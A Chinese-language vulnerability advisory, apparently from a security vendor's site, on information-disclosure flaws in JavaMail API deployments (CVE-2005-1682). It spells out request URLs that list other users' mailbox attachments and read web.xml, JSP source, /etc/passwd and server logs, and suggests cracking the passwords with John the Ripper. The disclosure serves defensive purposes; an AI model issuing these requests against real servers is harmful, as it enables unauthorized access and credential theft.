首页 -> 安全研究
安全研究
安全漏洞
Javamail多个信息泄露漏洞
发布日期:2005-05-25
更新日期:2005-05-25
受影响系统:
Sun JavaMail API 1.3描述:
Sun JavaMail API 1.2
Sun JavaMail API 1.1.3
BUGTRAQ ID: 13753
CVE(CAN) ID: CVE-2005-1682
JavaMail API是Java的可选软件包,提供独立于平台和协议的框架,用于创建邮件和消息应用程序。
JavaMail API中存在多个信息泄漏漏洞。
1. 打开特定邮箱附件
用户从Javamail域下载消息时,攻击者可以通知URL
user@example.com/messageid123@user/filename.extension" target="_blank">http://example.com/docdownloadfile.jsp?f=/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user/filename.extension
然后这个URL导致/var/folders,因此尝试切换文件夹。
user@example.com/messageid123@user" target="_blank">http://example.com/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user
但出现错误,因此最终到达这个URL:
user@example.com/" target="_blank">http://example.com/mailboxesdir/user@example.com/
这样就列出了user@example.com附件。
即使非授权用户也可以浏览特定的邮箱附件。攻击者只需知道用户名就可以得到附件列表。
user2@example.com/" target="_blank">http://example.com/mailboxesdir/user2@example.com/
user3@example.com/" target="_blank">http://example.com/mailboxesdir/user3@example.com/
2. 下载javamail配置信息
docdownloadfile.jsp重新定向到服务器中文件的位置,web浏览器得到重新定向名称:
user@example.com/messageid123@user/filename.extension" target="_blank">http://example.com/Download?/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user/filename.extension
这些信息泄漏了web.xml:
http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml
这样就可得到javamail配置信息。
下载jsp文件源码
http://example.com/Download?/var/serviceprovider/web/login.jsp
http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp
http://example.com/Download?/var/serviceprovider/web/addbook.jsp
http://example.com/Download?/var/serviceprovider/web/compose.jsp
http://example.com/Download?/var/serviceprovider/web/folder.jsp
3. 目标机器Root/Admin入侵
在web浏览器中输入http://example.com/Download?/etc/passwd
example of such a password file is:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
然后就可以使用John the Ripper破解Unix口令.
4. 下载服务器信息
http://example.com/Download?/var/log/boot.log
http://example.com/Download?/var/log/maillog
<*来源:Ricky Latt (ygnboyz@gmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111697083812367&w=2
*>
建议:
厂商补丁:
Sun
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sunsolve.sun.com/security
浏览次数:2804
严重程度:0(网友投票)
绿盟科技给您安全的保障